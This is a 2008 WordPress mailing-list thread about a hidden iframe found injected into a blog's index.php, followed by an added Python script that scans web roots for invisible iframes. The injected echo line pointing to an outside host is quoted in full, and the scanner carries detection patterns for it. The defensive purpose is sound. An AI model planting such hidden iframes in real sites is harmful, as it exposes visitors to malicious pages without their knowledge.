[wp-hackers] XSS vuln in wordpress 2.7 ?

Dan Gayle dangayle at gmail.com
Mon Dec 22 17:31:15 GMT 2008


Wow. That's nasty, and malicious. Could a plugin do that?

On Dec 22, 2008, at 9:27 AM, madalin wrote:

> Hello,
>
> For some reason I found my blog's index.php (not theme's index.php)
> with the following piece of code right before the ?>
>
> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>
> I tried looking at the logs. No luck. The file's permissions look like this:
>
> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
>
> I'm still trying to figure out how that line got there. I've
> downloaded wordpress right from wordpress.org, and the server is a
> dedicated one, only two users with shell access to it.
>
> Any suggestions ?
>
> -- 
> Regards,
> madalin
> http://madalin.eu
> http://www.tg-jiu.ro
> http://www.radioomega.ro
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
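
A way to sweep a web root for the kind of injected line quoted above, as an added example that is not part of the original thread: it flags any iframe that is 0 or 1 pixel in size or styled invisible, including PHP-escaped quotes. The function names are hypothetical and the sample file is constructed, with a placeholder host.

```python
import os
import re
import sys

# Opening <iframe ...> tag; [^>]* also spans a tag wrapped over two lines.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# src value, tolerating PHP-escaped quotes (\") as in an echo statement.
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?([^\s"'\\>]+)""", re.IGNORECASE)
# width/height of exactly 0 or 1 (optionally "px"); 10 or 100 do not match.
TINY_RE = re.compile(r"""\b(?:width|height)\s*=\s*\\?["']?[01](?:px)?\b""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

# Constructed sample modelled on the quoted index.php; host is a placeholder.
SAMPLE_INDEX_PHP = '''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
echo "<iframe src=\\"http://example.invalid/?click=1\\" width=1
height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
?>
'''


def find_hidden_iframes(text):
    """Return (line_number, src) for every iframe made invisible to visitors."""
    hits = []
    for match in IFRAME_RE.finditer(text):
        attrs = match.group(1)
        if TINY_RE.search(attrs) or HIDDEN_RE.search(attrs):
            src = SRC_RE.search(attrs)
            line_no = text.count("\n", 0, match.start()) + 1
            hits.append((line_no, src.group(1) if src else None))
    return hits


def scan_tree(root):
    """Walk a web root and map each affected file to its hidden iframes."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith((".php", ".html", ".htm", ".js")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, hits)
```

A match only shows where markup was planted; comparing each flagged file against a fresh copy from wordpress.org shows what else in it changed.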


